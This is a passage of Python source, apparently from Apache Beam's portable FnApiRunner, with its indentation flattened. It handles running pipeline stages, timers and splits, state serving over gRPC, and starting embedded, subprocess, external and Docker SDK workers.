def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
# TODO(SDF): This requires deterministic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes an environment and a
number of workers, and returns the list of ``WorkerHandler``s to use.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to lists that function as buffers for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker_handlers share the same grpc server, so we can read the grpc
# server info from any of them; use the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
logging.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so they are accessible to the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list, process_bundle_descriptor, data_input, data_output,
get_input_coder_impl, cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
transform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_inputs until residual_roots are included in the
# merged results. Without residual_roots, the pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` maps a transform's unique name to a PCollection buffer;
`data_side_input` maps (transform name, side input tag) to a pair of
(buffer id, access pattern); `data_output` maps a transform's unique
name to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
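# Editor's illustrative sketch (hypothetical helper, not used by the runner
# itself): when _use_continuation_tokens is enabled, get_raw() pages through
# the stored values one element at a time using the "nonce:index" tokens
# described above, until it returns a None continuation token.
def _example_read_all_state(servicer, state_key):
  data, token = servicer.get_raw(state_key)
  chunks = [data]
  while token is not None:
    data, token = servicer.get_raw(state_key, token)
    chunks.append(data)
  return b''.join(chunks)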
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
:arg static: If True, the generator always returns the same cache token;
if False, it returns a new cache token on each call.
:return: A generator which returns a cache token on next(generator).
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2
.ProcessBundleRequest.CacheToken.UserState(),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
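# Editor's illustrative sketch (assumption: FnApiRunner is the enclosing
# class, as it is referenced elsewhere in this file): a static generator
# keeps handing out the same cache token, while a dynamic one mints a new
# token on every next() call.
def _example_cache_tokens():
  static_gen = FnApiRunner.get_cache_token_generator(static=True)
  dynamic_gen = FnApiRunner.get_cache_token_generator(static=False)
  assert next(static_gen).token == next(static_gen).token
  assert next(dynamic_gen).token != next(dynamic_gen).token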
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}), state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info, max_workers):
self.state = state
self.provision_info = provision_info
self.max_workers = max_workers
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir)
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
def host_from_worker(self):
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
if payload:
num_workers, state_cache_size = payload.decode('ascii').split(',')
self._num_threads = int(num_workers)
self._state_cache_size = int(state_cache_size)
else:
self._num_threads = 1
self._state_cache_size = STATE_CACHE_SIZE
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads,
state_cache_size=self._state_cache_size, worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
# The subprocess module is not thread-safe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
logging.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
logging.info('Waiting for docker to start up. Current status is %s' %
status)
if status == b'running':
logging.info('Docker container is running. container_id = %s, '
'worker_id = %s', self._container_id, self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
max_total_workers = num_workers * len(self._environments)
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info,
max_total_workers)
elif max_total_workers > self._grpc_server.max_workers:
# Each gRPC server runs with a fixed number of threads (max_total_workers),
# set by the first call to get_worker_handlers(). Each worker needs its own
# connection to the gRPC server, so if a stage tries to add more workers
# than max_total_workers, some workers cannot connect and the pipeline
# would hang; raise an error here instead.
raise RuntimeError('gRPC servers are running with %s threads, we cannot '
'attach %s workers.' % (self._grpc_server.max_workers,
max_total_workers))
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
logging.info("Created Worker handler %s for environment %s",
worker_handler, environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
logging.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
